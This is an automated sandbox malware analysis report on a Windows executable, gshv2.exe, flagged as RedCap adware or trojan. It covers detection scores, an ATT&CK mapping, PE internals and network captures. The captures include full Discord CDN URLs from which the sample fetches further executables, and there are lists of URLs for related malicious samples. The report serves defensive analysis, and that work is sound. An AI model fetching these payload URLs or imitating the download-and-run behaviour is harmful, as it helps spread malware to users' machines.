Code function: 0_2_00007FF62C0D04F0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00007FF62C0D04F0

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	11 Process Injection	11 Process Injection	21 Input Capture	1 System Time Discovery	Remote Services	21 Input Capture	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Obfuscated Files or Information	LSASS Memory	11 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	14 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 DLL Side-Loading	Security Account Manager	2 System Information Discovery	SMB/Windows Admin Shares	3 Clipboard Data	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	14 Application Layer Protocol	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
gshv2.exe	68%	Virustotal		Browse
gshv2.exe	55%	ReversingLabs	Win64.Adware.RedCap
gshv2.exe	100%	Avira	TR/Redcap.odhte
gshv2.exe	100%	Joe Sandbox ML

Name	IP	Active	Malicious	Antivirus Detection	Reputation
cdn.discordapp.com	162.159.129.233	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://cdn.discordapp.com/attachments/1019415395452588092/1019417039519092736/dxd32s.exe	false		high
https://cdn.discordapp.com/attachments/926255566924447794/952693608832708628/chrome.exe	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://cdn.discordapp.com/attachments/1019415395452588092/1019417039519092736/dxd32s.exendowsF	gshv2.exe, 00000000.00000002.1759636616.0000021F5385B000.00000004.00000020.00020000.00000000.sdmp	false	high
https://cdn.discordapp.com/attachments/926255566924447794/952693608832708628/chrome.exe:	gshv2.exe, 00000000.00000002.1759636616.0000021F53898000.00000004.00000020.00020000.00000000.sdmp	false	high
https://cdn.discordapp.com/attachments/926255566924447794/952693608832708628/chrome.exe03:21:08	gshv2.exe	false	high
https://cdn.discordapp.com/	gshv2.exe, 00000000.00000002.1759636616.0000021F53898000.00000004.00000020.00020000.00000000.sdmp	false	high
https://cdn.discordapp.com/attachments/926255566924447794/952693608832708628/chrome.exe.	gshv2.exe, 00000000.00000002.1759636616.0000021F53898000.00000004.00000020.00020000.00000000.sdmp	false	high
https://cdn.discordapp.com/L	gshv2.exe, 00000000.00000002.1759636616.0000021F53898000.00000004.00000020.00020000.00000000.sdmp	false	high
https://cdn.discordapp.com/attachments/1019415395452588092/1019417039519092736/dxd32s.exeC:	gshv2.exe	false	high
https://cdn.discordapp.com/attachments/926255566924447794/952693608832708628/chrome.exer	gshv2.exe, 00000000.00000002.1759636616.0000021F53898000.00000004.00000020.00020000.00000000.sdmp	false	high
https://cdn.discordapp.com/attachments/926255566924447794/952693608832708628/chrome.exe11	gshv2.exe, 00000000.00000002.1759636616.0000021F53898000.00000004.00000020.00020000.00000000.sdmp	false	high
https://cdn.discordapp.com/attachments/1019415395452588092/1019417039519092736/dxd32s.exer	gshv2.exe, 00000000.00000003.1666174920.0000021F538E2000.00000004.00000020.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
162.159.129.233	cdn.discordapp.com	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1581356
Start date and time:	2024-12-27 13:34:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 2m 13s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	3
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	gshv2.exe
Detection:	MAL
Classification:	mal68.winEXE@4/1@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 4 Number of non-executed functions: 67
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
162.159.129.233	Cheat_Lab_2.7.2.msi	Get hash	malicious	Unknown	Browse	cdn.discordapp.com/attachments/1175364766026436628/1175364839565176852/2
	Cheat.Lab.2.7.1.msi	Get hash	malicious	RedLine	Browse	cdn.discordapp.com/attachments/1166694372084027482/1169541101917577226/2.txt
	QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	Get hash	malicious	AgentTesla	Browse	cdn.discordapp.com/attachments/1152164172566630421/1153564703793107036/Rezyurp.exe
	SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	cdn.discordapp.com/attachments/956928735397965906/1004544301541363733/bantylogger_dhBqf163.bin
	64AE5410F978DF0F48DCC67508820EA230C566967E002.exe	Get hash	malicious	DCRat	Browse	cdn.discordapp.com/attachments/932607293869146142/941782821578633216/Sjxupcet.jpg
	http://162.159.129.233	Get hash	malicious	Unknown	Browse	162.159.129.233/favicon.ico
	2lfV6QiE6j.exe	Get hash	malicious	Unknown	Browse	cdn.discordapp.com/attachments/937614907917078588/937618926945329213/macwx.log
	SecuriteInfo.com.Trojan.Siggen15.38099.19640.exe	Get hash	malicious	Amadey	Browse	cdn.discordapp.com/attachments/878034206570209333/908810886561534042/slhost.exe
	1PhgF7ujwW.exe	Get hash	malicious	Amadey	Browse	cdn.discordapp.com/attachments/878382243242983437/879280740578263060/FastingTabbied_2021-08-23_11-26.exe
	vhNyVU8USk.exe	Get hash	malicious	Amadey	Browse	cdn.discordapp.com/attachments/837741922641903637/866064264027701248/svchost.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
cdn.discordapp.com	PO_11171111221.Vbs.vbs	Get hash	malicious	FormBook	Browse	162.159.129.233
	WO-663071 Sabiya Power Station Project.vbs	Get hash	malicious	Remcos	Browse	162.159.129.233
	sNifdpWiY9.exe	Get hash	malicious	Metasploit, Meterpreter	Browse	162.159.134.233
	EsgeCzT4do.exe	Get hash	malicious	XWorm	Browse	162.159.129.233
	file.exe	Get hash	malicious	Unknown	Browse	162.159.135.233
	file.exe	Get hash	malicious	CStealer	Browse	162.159.134.233
	https://cdn.discordapp.com/attachments/1284277835762110544/1305291734967779460/emu.exe?ex=67327f28&is=67312da8&hm=ea20e1c2a609dc1a0569bd4abb7e0da0a5e0671f3f7a388c1ed138f806c8e0c4&	Get hash	malicious	Unknown	Browse	162.159.135.233
	SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe	Get hash	malicious	Xmrig	Browse	162.159.135.233
	segura.vbs	Get hash	malicious	Remcos	Browse	162.159.135.233
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	162.159.129.233

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	OiMp3TH.exe	Get hash	malicious	LummaC	Browse	172.67.216.236
	https://dnsextension.pro/invoice/d2d0bf8701b34bc296ca83b956c10720	Get hash	malicious	Unknown	Browse	104.21.31.138
	k0ukcEH.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	appFile.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.94.92
	FloydMounts.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.25.41
	5uVReRlvME.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Remcos, Stealc	Browse	172.67.165.185
	0A7XTINw3R.exe	Get hash	malicious	Unknown	Browse	104.26.8.44
	RDb082EApV.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	GnHq2ZaBUl.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	vVJvxAfBDM.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	104.21.11.101

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	DOTA2#U89c6#U8ddd#U63d2#U4ef6.exe	Get hash	malicious	Unknown	Browse	162.159.129.233
	n5Szx8qsFB.lnk	Get hash	malicious	Unknown	Browse	162.159.129.233
	InExYnlM0N.lnk	Get hash	malicious	Unknown	Browse	162.159.129.233
	K9esyY0r4G.lnk	Get hash	malicious	Unknown	Browse	162.159.129.233
	vreFmptfUu.lnk	Get hash	malicious	DanaBot	Browse	162.159.129.233
	aD7D9fkpII.exe	Get hash	malicious	Vidar	Browse	162.159.129.233
	installer.bat	Get hash	malicious	Vidar	Browse	162.159.129.233
	skript.bat	Get hash	malicious	Vidar	Browse	162.159.129.233
	din.exe	Get hash	malicious	Vidar	Browse	162.159.129.233
	yoda.exe	Get hash	malicious	Vidar	Browse	162.159.129.233

Process:	C:\Users\user\Desktop\gshv2.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	30
Entropy (8bit):	3.911080496244278
Encrypted:	false
SSDEEP:	3:43FhlRLLcv:5v
MD5:	C1C449569C7F1CA92C57DE05C38E6A3B
SHA1:	287DE503E38632FA73A477A372F19F0D646307A0
SHA-256:	4C7A4EF68BC5809FACA2AB18DA4A8B8874E565BACBD9B61DC3BADD8B8997BE67
SHA-512:	3C5F585FC8BE8EBB0D75C4F1FA4715C9112ACEE4B303CDDFFE4E2E3DBBCC79C01B3A0882B96AA8EFDEBE9DA4EEE3020B12F70624A96768952CBDDB5F32B3D99D
Malicious:	false
Reputation:	low
Preview:	[+] Driver Did Not Start.....

Static File Info

General

File type:	PE32+ executable (console) x86-64, for MS Windows
Entropy (8bit):	6.527801780732871
TrID:	Win64 Executable Console (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	gshv2.exe
File size:	254'976 bytes
MD5:	27f0e3dbf939ae14775e062a8445f0e5
SHA1:	502104b0540cf3a031c7d1aa3704946bdc253b72
SHA256:	7536d907def00cb0b8948d7651697a670d15b85545480931ea6de7f637ea4502
SHA512:	ec758a028d04b69b7550f98fb25ee4e84ae69b90b7e83ccf6f7a5e1750f74980bc8beacddbcee042b99a2e03dc286dfdff96216778b2a319abfeab2daf560dfb
SSDEEP:	6144:6jQKxscJFJ8bJSCJRrGCBuDyCafW1/7pbaqo4VMhhMGSGlEantaAetFqJj:6sMtfeUYB9W1/7pbaqo4VMhqGGangAe2
TLSH:	8F446C8571E44DF9E8AA4079909AB30FF9363C48072096CB73E8455A2FF37E05AFE255
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................*.....................................................Z.......Z.F.....Z.......Rich...........................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x14002ff38
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x63212C89 [Wed Sep 14 01:21:13 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	75ba8e041b85918858b336a0a4ef1d7b

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007FA9AC7FDE64h
dec eax
add esp, 28h
jmp 00007FA9AC7FD727h
int3
int3
inc eax
push ebx
dec eax
sub esp, 20h
dec eax
mov ebx, ecx
xor ecx, ecx
call dword ptr [000021A3h]
dec eax
mov ecx, ebx
call dword ptr [00002192h]
call dword ptr [0000219Ch]
dec eax
mov ecx, eax
mov edx, C0000409h
dec eax
add esp, 20h
pop ebx
dec eax
jmp dword ptr [00002190h]
dec eax
mov dword ptr [esp+08h], ecx
dec eax
sub esp, 38h
mov ecx, 00000017h
call dword ptr [00002184h]
test eax, eax
je 00007FA9AC7FD8B9h
mov ecx, 00000002h
int 29h
dec eax
lea ecx, dword ptr [0000DACAh]
call 00007FA9AC7FD95Eh
dec eax
mov eax, dword ptr [esp+38h]
dec eax
mov dword ptr [0000DBB1h], eax
dec eax
lea eax, dword ptr [esp+38h]
dec eax
add eax, 08h
dec eax
mov dword ptr [0000DB41h], eax
dec eax
mov eax, dword ptr [0000DB9Ah]
dec eax
mov dword ptr [0000DA0Bh], eax
dec eax
mov eax, dword ptr [esp+40h]
dec eax
mov dword ptr [0000DB0Fh], eax
mov dword ptr [0000D9E5h], C0000409h
mov dword ptr [0000D9DFh], 00000001h
mov dword ptr [0000D9E9h], 00000001h

Rich Headers

Programming Language:

[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3b65c	0x154	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x42000	0x1e8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x3f000	0x2148	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x43000	0xb4	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x37830	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x37880	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x376f0	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x32000	0x550	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x3051a	0x30600	1970c74cf237ee6d7a28b3d23a2ec9ff	False	0.5273185158268734	data	6.415128638716904	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x32000	0xa910	0xaa00	66375af56df5aa01a2dc8d19b9896fae	False	0.5642233455882353	data	6.203891402049001	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3d000	0x15f0	0xa00	a462543bfd99abb2aade1fb127db8681	False	0.33984375	data	3.8962215563242455	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x3f000	0x2148	0x2200	861186c329b2e2c74f22e320b68b0620	False	0.4568014705882353	data	5.495571607115991	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x42000	0x1e8	0x200	43c22ac8647ebbb96b2605592cfe3000	False	0.537109375	data	4.754815332235538	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x43000	0xb4	0x200	3a1fc5634efbebfedf5fe2d9566c5e16	False	0.32421875	data	2.305056545353035	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x42060	0x188	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5892857142857143

Imports

DLL	Import
dwmapi.dll	DwmExtendFrameIntoClientArea
KERNEL32.dll	GlobalLock, GlobalUnlock, QueryPerformanceFrequency, QueryPerformanceCounter, SetConsoleTextAttribute, SetConsoleTitleA, GetStdHandle, DeviceIoControl, CreateFileW, Sleep, GetLastError, CloseHandle, CreateThread, FormatMessageA, EnterCriticalSection, LeaveCriticalSection, GlobalAlloc, DeleteCriticalSection, SetEvent, ResetEvent, WaitForSingleObjectEx, CreateEventW, GetModuleHandleW, GetProcAddress, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetCurrentProcessId, GlobalFree, GetCurrentThreadId, InitializeCriticalSectionAndSpinCount, GetSystemTimeAsFileTime, InitializeSListHead
USER32.dll	CreateWindowExA, GetAsyncKeyState, ShowWindow, SetWindowPos, DestroyWindow, GetWindowRect, GetWindowLongA, GetWindow, GetWindowThreadProcessId, GetForegroundWindow, TranslateMessage, mouse_event, PeekMessageA, PostQuitMessage, MoveWindow, DispatchMessageA, DefWindowProcA, FindWindowA, RegisterClassExA, UpdateWindow, GetKeyState, LoadCursorA, ScreenToClient, SetWindowLongA, SetClipboardData, GetClipboardData, EmptyClipboard, CloseClipboard, OpenClipboard, GetCursorPos, SetCursorPos, ReleaseCapture, GetClientRect, SetCursor, GetActiveWindow, GetCapture, ClientToScreen, SetCapture
IMM32.dll	ImmSetCompositionWindow, ImmGetContext, ImmReleaseContext
MSVCP140.dll	?_Xout_of_range@std@@YAXPEBD@Z, ?_Xlength_error@std@@YAXPEBD@Z
d3d9.dll	Direct3DCreate9Ex
urlmon.dll	URLDownloadToFileW, URLDownloadToFileA
VCRUNTIME140_1.dll	__CxxFrameHandler4
VCRUNTIME140.dll	_CxxThrowException, memset, __C_specific_handler, __current_exception_context, __current_exception, __std_exception_copy, __std_exception_destroy, strchr, strstr, __std_terminate, memchr, memcpy, memmove
api-ms-win-crt-stdio-l1-1-0.dll	fflush, __acrt_iob_func, fseek, ftell, __stdio_common_vfprintf, fwrite, __stdio_common_vsprintf, fclose, fread, __stdio_common_vsscanf, _wfopen, __stdio_common_vsprintf_s, _set_fmode, __p__commode
api-ms-win-crt-string-l1-1-0.dll	strcmp
api-ms-win-crt-utility-l1-1-0.dll	qsort, rand
api-ms-win-crt-heap-l1-1-0.dll	free, _callnewh, malloc, _set_new_mode
api-ms-win-crt-runtime-l1-1-0.dll	__p___argc, __p___argv, _c_exit, _register_thread_local_exe_atexit_callback, _exit, _initterm_e, _initterm, _get_initial_narrow_environment, _invalid_parameter_noinfo_noreturn, terminate, _set_app_type, _seh_filter_exe, exit, _cexit, _configure_narrow_argv, system, _initialize_narrow_environment, _crt_atexit, _initialize_onexit_table, _register_onexit_function
api-ms-win-crt-math-l1-1-0.dll	ceilf, pow, fmodf, floorf, powf, sinf, sqrt, __setusermatherr, asinf, tanf, sqrtf, cosf
api-ms-win-crt-locale-l1-1-0.dll	_configthreadlocale

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-27T13:34:57.890716+0100	2022550	ET MALWARE Possible Malicious Macro DL EXE Feb 2016	1	192.168.2.4	49732	162.159.129.233	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 27, 2024 13:34:56.020137072 CET	49732	443	192.168.2.4	162.159.129.233
Dec 27, 2024 13:34:56.020179033 CET	443	49732	162.159.129.233	192.168.2.4
Dec 27, 2024 13:34:56.020262957 CET	49732	443	192.168.2.4	162.159.129.233
Dec 27, 2024 13:34:56.028577089 CET	49732	443	192.168.2.4	162.159.129.233
Dec 27, 2024 13:34:56.028593063 CET	443	49732	162.159.129.233	192.168.2.4
Dec 27, 2024 13:34:57.342452049 CET	443	49732	162.159.129.233	192.168.2.4
Dec 27, 2024 13:34:57.342526913 CET	49732	443	192.168.2.4	162.159.129.233
Dec 27, 2024 13:34:57.499670982 CET	49732	443	192.168.2.4	162.159.129.233
Dec 27, 2024 13:34:57.499712944 CET	443	49732	162.159.129.233	192.168.2.4
Dec 27, 2024 13:34:57.500102997 CET	443	49732	162.159.129.233	192.168.2.4
Dec 27, 2024 13:34:57.500157118 CET	49732	443	192.168.2.4	162.159.129.233
Dec 27, 2024 13:34:57.503518105 CET	49732	443	192.168.2.4	162.159.129.233
Dec 27, 2024 13:34:57.551338911 CET	443	49732	162.159.129.233	192.168.2.4
Dec 27, 2024 13:34:57.890737057 CET	443	49732	162.159.129.233	192.168.2.4
Dec 27, 2024 13:34:57.890796900 CET	443	49732	162.159.129.233	192.168.2.4
Dec 27, 2024 13:34:57.890799046 CET	49732	443	192.168.2.4	162.159.129.233
Dec 27, 2024 13:34:57.890841961 CET	49732	443	192.168.2.4	162.159.129.233
Dec 27, 2024 13:34:57.898185015 CET	49732	443	192.168.2.4	162.159.129.233
Dec 27, 2024 13:34:57.898205042 CET	443	49732	162.159.129.233	192.168.2.4
Dec 27, 2024 13:34:57.898212910 CET	49732	443	192.168.2.4	162.159.129.233
Dec 27, 2024 13:34:57.898256063 CET	49732	443	192.168.2.4	162.159.129.233
Dec 27, 2024 13:35:03.542129993 CET	49733	443	192.168.2.4	162.159.129.233
Dec 27, 2024 13:35:03.542222023 CET	443	49733	162.159.129.233	192.168.2.4
Dec 27, 2024 13:35:03.542365074 CET	49733	443	192.168.2.4	162.159.129.233
Dec 27, 2024 13:35:03.542601109 CET	49733	443	192.168.2.4	162.159.129.233
Dec 27, 2024 13:35:03.542637110 CET	443	49733	162.159.129.233	192.168.2.4
Dec 27, 2024 13:35:04.753602982 CET	443	49733	162.159.129.233	192.168.2.4
Dec 27, 2024 13:35:04.754847050 CET	49733	443	192.168.2.4	162.159.129.233
Dec 27, 2024 13:35:04.755274057 CET	49733	443	192.168.2.4	162.159.129.233
Dec 27, 2024 13:35:04.755296946 CET	443	49733	162.159.129.233	192.168.2.4
Dec 27, 2024 13:35:04.755484104 CET	49733	443	192.168.2.4	162.159.129.233
Dec 27, 2024 13:35:04.755496025 CET	443	49733	162.159.129.233	192.168.2.4
Dec 27, 2024 13:35:05.206065893 CET	443	49733	162.159.129.233	192.168.2.4
Dec 27, 2024 13:35:05.206119061 CET	443	49733	162.159.129.233	192.168.2.4
Dec 27, 2024 13:35:05.206202030 CET	49733	443	192.168.2.4	162.159.129.233
Dec 27, 2024 13:35:05.210676908 CET	49733	443	192.168.2.4	162.159.129.233
Dec 27, 2024 13:35:05.210676908 CET	49733	443	192.168.2.4	162.159.129.233
Dec 27, 2024 13:35:05.210726023 CET	443	49733	162.159.129.233	192.168.2.4
Dec 27, 2024 13:35:05.210982084 CET	49733	443	192.168.2.4	162.159.129.233

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 27, 2024 13:34:55.876647949 CET	50195	53	192.168.2.4	1.1.1.1
Dec 27, 2024 13:34:56.013935089 CET	53	50195	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 27, 2024 13:34:55.876647949 CET	192.168.2.4	1.1.1.1	0x40a8	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Dec 27, 2024 13:34:56.013935089 CET	1.1.1.1	192.168.2.4	0x40a8	No error (0)	cdn.discordapp.com	162.159.129.233	A (IP address)	IN (0x0001)	false
Dec 27, 2024 13:34:56.013935089 CET	1.1.1.1	192.168.2.4	0x40a8	No error (0)	cdn.discordapp.com	162.159.130.233	A (IP address)	IN (0x0001)	false
Dec 27, 2024 13:34:56.013935089 CET	1.1.1.1	192.168.2.4	0x40a8	No error (0)	cdn.discordapp.com	162.159.134.233	A (IP address)	IN (0x0001)	false
Dec 27, 2024 13:34:56.013935089 CET	1.1.1.1	192.168.2.4	0x40a8	No error (0)	cdn.discordapp.com	162.159.135.233	A (IP address)	IN (0x0001)	false
Dec 27, 2024 13:34:56.013935089 CET	1.1.1.1	192.168.2.4	0x40a8	No error (0)	cdn.discordapp.com	162.159.133.233	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

cdn.discordapp.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49732	162.159.129.233	443	6096	C:\Users\user\Desktop\gshv2.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 12:34:57 UTC	359	OUT	GET /attachments/1019415395452588092/1019417039519092736/dxd32s.exe HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: cdn.discordapp.com Connection: Keep-Alive
2024-12-27 12:34:57 UTC	1064	IN	HTTP/1.1 404 Not Found Date: Fri, 27 Dec 2024 12:34:57 GMT Content-Type: text/plain;charset=UTF-8 Content-Length: 36 Connection: close Set-Cookie: __cf_bm=Ml3sgB8EA3OYOvAD7HbKsuUU9dolwk27rqJ25I_20zs-1735302897-1.0.1.1-GcZjiQkzq_IkER7Qy3.0SVunBneZhYGBKljSSIoZ58.ftrtWgnFaqwaQsQdsUhnmfwjMZUWsRuu01ONHIb5Nlg; path=/; expires=Fri, 27-Dec-24 13:04:57 GMT; domain=.discordapp.com; HttpOnly; Secure; SameSite=None Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=898Eminxt%2FiRtRfKNZ0XB8iQQMwMXXeNfTrElGiP02RY0Pk5KuItFVq%2F59fSQZ1tuBf7SlklTFbCKo9LAMEQuiQuMEp%2BwclXz8Y4nl8Gm%2FxZfWy5D0g6WEiQeQKliF16bRY2tA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Set-Cookie: _cfuvid=LosZoUHKm3b7VGnY3l06DQjB0NBMkedqDPjXQQIWA24-1735302897726-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 8f8959067fb780e2-EWR alt-svc: h3=":443"; ma=86400
2024-12-27 12:34:57 UTC	36	IN	Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e Data Ascii: This content is no longer available.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49733	162.159.129.233	443	6096	C:\Users\user\Desktop\gshv2.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 12:35:04 UTC	609	OUT	GET /attachments/926255566924447794/952693608832708628/chrome.exe HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: cdn.discordapp.com Connection: Keep-Alive Cookie: __cf_bm=Ml3sgB8EA3OYOvAD7HbKsuUU9dolwk27rqJ25I_20zs-1735302897-1.0.1.1-GcZjiQkzq_IkER7Qy3.0SVunBneZhYGBKljSSIoZ58.ftrtWgnFaqwaQsQdsUhnmfwjMZUWsRuu01ONHIb5Nlg; _cfuvid=LosZoUHKm3b7VGnY3l06DQjB0NBMkedqDPjXQQIWA24-1735302897726-0.0.1.1-604800000
